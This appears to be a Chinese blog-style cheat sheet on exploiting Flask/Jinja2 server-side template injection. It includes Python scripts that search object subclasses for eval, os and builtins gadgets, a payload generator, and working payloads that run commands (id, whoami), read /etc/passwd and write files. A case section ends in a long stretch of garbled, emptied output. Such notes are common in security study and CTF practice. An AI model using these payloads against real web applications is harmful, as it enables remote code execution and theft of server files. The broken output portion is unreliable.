一 flask
1 、基本用法
>>> [].__class__.__base__>>> [].__class__.__mro__ ( , ) >>> [].__class__.__bases__ ( ,)
2、取子类
[].__class__.__base__.__subclasses__() [].__class__.__bases__[0].__subclasses__() [].__class__.__bases__[-1].__subclasses__() [].__class__.__mro__[-1].__subclasses__()
3findpayload
# print("1:","".__class__) # print("2:","".__class__.__bases__) # print("3","".__class__.__mro__) # print("4","".__class__.__bases__[0].__subclasses__()) # for m in "".__class__.__bases__[0].__subclasses__(): # print(m) # for c in [].__class__.__base__.__subclasses__(): # if (c.__name__=='catch_warnings'): # print( c.__init__.__globals__['__builtins__']) def find_payload(): #"".__class__.__mro__[-1].__subclasses__() ====> "".__class__.__bases__[0].__subclasses__() for i,item in enumerate("".__class__.__bases__[0].__subclasses__()): # print(i,item) try: if "os" in item.__init__.__globals__: print("os:",i,item) # print(item.__init__.__globals__['os'].system("dir ./")) # print(item.__init__.__globals__['os'].popen('ls').read()) # break if "builtins" in item.__init__.__globals__: print("builtins:",i,item) # print(item.__init__.__globals__['builtins'].eval("__import__('os').popen('dir ').read()")) # print(item.__init__.__globals__['builtins'].eval("__import__('os').system('ls')")) if 'linecache' in item.__init__.__globals__.keys(): print("linecache:", i, item) except Exception as e: pass def find_eval(): for i,item in enumerate("".__class__.__bases__[0].__subclasses__()): # if item.__name__ == 'catch_warnings': if item.__name__=='catch_warnings': # print(item) # for key,b in item.__init__.__globals__.items(): for b in item.__init__.__globals__.values(): if b.__class__ == {}.__class__: # print(b.__class__) if 'eval' in b.keys(): # print(b.keys()) # print(b["eval"]) print(b["eval"]('__import__("os").popen("whoami").read()')) # print(b["eval"]) #print(b) # print(key) def test(): for i ,index in enumerate("".__class__.__mro__[-1].__subclasses__()): try: if "builtins" in str(index.__init__.__globals__): print(i,index.__init__.__globals__["builtins"]) print(i, index.__init__.__globals__.items()) # print(index.__init__.__globals__['builtins'].eval("__import__('os').popen('dir ').read()")) break except: pass if __name__ == '__main__': # find_eval() # find_payload() test()
4、search
#!C:\Python3.7 # -*- coding:utf-8 -*- from flask import Flask from jinja2 import Template # Some of special names searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__'] neededFunction = ['eval', 'open', 'exec'] pay = int(input("Payload?[1|0]")) # pay = int(input("http://127.0.0.1:5000/?[1|0]")) for index, i in enumerate({}.__class__.__base__.__subclasses__()): for attr in searchList: if hasattr(i, attr): if eval('str(i.'+attr+')[1:9]') == 'function': for goal in neededFunction: if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')): if pay != 1: print(i.__name__,":", attr, goal) else: print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{
{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")
5 payload
python3
#命令执行: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %} #文件操作 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
python2
#注入变量执行命令详见 http://www.freebuf.com/articles/web/98928.html
#读文件:
{
{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} #写文件: {
{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}
6案例
从0-1书中python-ssti
网址:https://blog.csdn.net/weixin_/article/details/?spm=1001.2014.3001.5501
1、显示子类
输入:?password={
{"".__class__.__bases__[0].__subclasses__()}} 输出: [
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,